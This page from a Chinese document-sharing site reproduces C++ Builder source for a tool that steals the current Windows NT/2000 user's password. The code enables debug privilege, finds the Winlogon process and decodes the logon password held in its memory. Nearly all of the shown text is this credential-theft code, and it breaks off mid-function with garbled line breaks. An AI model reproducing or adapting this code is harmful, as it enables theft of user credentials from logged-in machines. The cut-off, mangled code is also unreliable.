获取WinNT当前用户名和密码.docx
- 文档编号:11399286
- 上传时间:2023-02-28
- 格式:DOCX
- 页数:15
- 大小:19.39KB
获取WinNT当前用户名和密码.docx
《获取WinNT当前用户名和密码.docx》由会员分享,可在线阅读,更多相关《获取WinNT当前用户名和密码.docx(15页珍藏版)》请在冰豆网上搜索。
获取WinNT当前用户名和密码
本文所用的代码原创作者已不知.是ccrun的一个朋友磨刀老头提供给的,在此对作者表示感谢.经ccrun(老妖)在Win2k下试验成功.
// 获取WinNT/Win2k当前用户名和密码,调用以下函数即可:
// bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
//---------------------------------------------------------------------------
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
}UNICODE_STRING, *PUNICODE_STRING;
typedef struct _QUERY_SYSTEM_INFORMATION
{
DWORD GrantedAccess;
DWORD PID;
WORD HandleType;
WORD HandleId;
DWORD Handle;
}QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
DWORD Count;
DWORD Unk04;
DWORD Unk08;
}PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
DWORD LoadAddress;
DWORD Size;
DWORD Unk08;
DWORD Enumerator;
DWORD Unk10;
char Name [0x108];
}PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
DWORD HashByte;
DWORD Unk04;
DWORD Unk08;
DWORD Unk0C;
FILETIME LoggedOn;
DWORD Unk18;
DWORD Unk1C;
DWORD Unk20;
DWORD Unk24;
DWORD Unk28;
UNICODE_STRING EncodedPassword;
}ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);
// Private Prototypes
BOOL IsWinNT(void);
BOOL IsWin2K(void);
BOOL AddDebugPrivilege(void);
DWORD FindWinLogon(void);
BOOL LocatePasswordPageWinNT(DWORD, PDWORD);
BOOL LocatePasswordPageWin2K(DWORD, PDWORD);
void ReturnWinNTPwd(String &, String &, String &);
void ReturnWin2kPwd(String &, String &, String &);
bool GetPassword(String &, String &, String &);
// Global Variables
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;
DWORD dwPwdLen = 0;
PVOID pvRealPwd = NULL;
PVOID pvPwd = NULL;
DWORD dwHashByte = 0;
wchar_t wszUserName[0x400];
wchar_t wszUserDomain[0x400];
//---------------------------------------------------------------------------
bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
if(!
IsWinNT() && !
IsWin2K())
{
// 只适合于2000或者xp
return false;
}
// Add debug privilege to PasswordReminder -
// this is needed for the search for Winlogon.
if(!
AddDebugPrivilege())
{
// 不能够添加debug特权
return false;
}
// debug特权已经成功加入到本程序
HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL");
pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)
GetProcAddress(hNtDll,"NtQuerySystemInformation");
pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)
GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer");
pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION)
GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation");
pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER)
GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer");
pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING)
GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString");
// Locate WinLogon's PID - need debug privilege and admin rights.
DWORD dwWinLogonPID = FindWinLogon ();
if(!
dwWinLogonPID)
{
// 找不到进程WinLogon 或者正在使用 NWGINA.DLL
// 导致不能在内存中找到密码
FreeLibrary(hNtDll);
return false;
}
// Format("主进程WinLogon的id是 %d (0x%8.8x).\n",
// ARRAYOFCONST(((int)dwWinLogonPID, (int)dwWinLogonPID))));
// Set values to check memory block against.
memset(wszUserName, 0, sizeof (wszUserName));
memset(wszUserDomain, 0, sizeof (wszUserDomain));
GetEnvironmentVariableW(L"USERNAME",wszUserName,0x400);
GetEnvironmentVariableW(L"USERDOMAIN", wszUserDomain, 0x400);
// Locate the block of memory containing
// the password in WinLogon's memory space.
BOOL bFoundPasswordPage;
//bFoundPasswordPage = FALSE;
if(IsWin2K())
bFoundPasswordPage = LocatePasswordPageWin2K(dwWinLogonPID, &dwPwdLen);
else
bFoundPasswordPage = LocatePasswordPageWinNT(dwWinLogonPID, &dwPwdLen);
if(bFoundPasswordPage)
{
if(dwPwdLen == 0)
{
// Format("登陆信息为:
域名:
%S/密码:
%S.\n",
// ARRAYOFCONST((wszUserDomain, wszUserName))));
// 密码长度为空,系统没有密码
}
else
{
// Format("找到了密码,长度为%d\n", ARRAYOFCONST(((int)dwPwdLen))));
// Decode the password string.
if(IsWin2K())
ReturnWin2kPwd(strCurrDomain, strCurrUser, strCurrPwd);
else
ReturnWinNTPwd(strCurrDomain, strCurrUser, strCurrPwd);
}
}
else
{
FreeLibrary(hNtDll);
return false;
}// 没有在内存中间找到密码
return true;
}
//---------------------------------------------------------------------------
BOOL IsWinNT(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if(GetVersionEx(&OSVersionInfo))
return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT);
else
return (FALSE);
}
//---------------------------------------------------------------------------
BOOL IsWin2K(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (GetVersionEx(&OSVersionInfo))
return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)
&& (OSVersionInfo.dwMajorVersion == 5));
else
return (FALSE);
}
//---------------------------------------------------------------------------
BOOL AddDebugPrivilege(void)
{
HANDLE Token;
TOKEN_PRIVILEGES TokenPrivileges, PreviousState;
DWORD ReturnLength = 0;
if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token))
if(LookupPrivilegeValue(NULL, "SeDebugPrivilege", &TokenPrivileges.Privileges[0].Luid))
{
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
return (AdjustTokenPrivileges(Token, FALSE, &TokenPrivileges,
sizeof (TOKEN_PRIVILEGES), &PreviousState, &ReturnLength));
}
return (FALSE);
}
//---------------------------------------------------------------------------
// 本文是ccrun(老妖)的一个朋友提供的代码.有问题或建议请致信:
info@
// 欢迎光临C++ Builder 研究
//---------------------------------------------------------------------------
// Note that the following code eliminates the need
// for PSAPI.DLL as part of the executable.
DWORD FindWinLogon(void)
{
#define INITIAL_ALLOCATION 0x100
DWORD dwRc = 0;
DWORD dwSizeNeeded = 0;
PVOID pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION);
// Find how much memory is required.
pfnNtQuerySystemInformation(0x10, pvInfo, INITIAL_ALLOCATION, &dwSizeNeeded);
HeapFree(GetProcessHeap(), 0, pvInfo);
// Now, allocate the proper amount of memory.
pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSizeNeeded);
DWORD dwSizeWritten = dwSizeNeeded;
if(pfnNtQuerySystemInformation(0x10, pvInfo, dwSizeNeeded, &dwSizeWritten))
{
HeapFree(GetProcessHeap(), 0, pvInfo);
return (0);
}
DWORD dwNumHandles = dwSizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);
if(dwNumHandles == 0)
{
HeapFree(GetProcessHeap(), 0, pvInfo);
return (0);
}
PQUERY_SYSTEM_INFORMATION QuerySystemInformationP =
(PQUERY_SYSTEM_INFORMATION) pvInfo;
try
{
for(DWORD i=1; i<=dwNumHandles; i++)
{
// "5" is the value of a kernel object type process.
if (QuerySystemInformationP->HandleType == 5)
{
PVOID pvDebugBuffer = pfnRtlCreateQueryDebugBuffer(0, 0);
if(pfnRtlQueryProcessDebugInformation
(QuerySystemInformationP->PID, 1, pvDebugBuffer) == 0)
{
PPROCESS_INFO_HEADER pihProcessInfoHeader =
(PPROCESS_INFO_HEADER)((DWORD)pvDebugBuffer + 0x60);
DWORD dwCount = pihProcessInfoHeader->Count;
PPROCESS_INFO piProcessInfo = (PPROCESS_INFO)
((DWORD)pihProcessInfoHeader + sizeof (PROCESS_INFO_HEADER));
// Form1->Memo1->Lines->Add(piProcessInfo->Name);
AnsiString strName = piProcessInfo->Name;
// if(strstr((char *)UpCase(*piProcessInfo->Name), "WINLOGON") !
= 0)
if(strName.UpperCase().Pos("WINLOGON") !
= 0)
{
DWORD dwTemp = (DWORD)piProcessInfo;
for (DWORD j=0; j { dwTemp += sizeof (PROCESS_INFO); piProcessInfo = (PPROCESS_INFO)dwTemp; strName = piProcessInfo->Name; if(strName.UpperCase().Pos("NWGINA") ! =0 ) return (0); if(strName.UpperCase().Pos("MSGINA") ! =0 ) dwRc =Q
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 获取 WinNT 当前 用户名 密码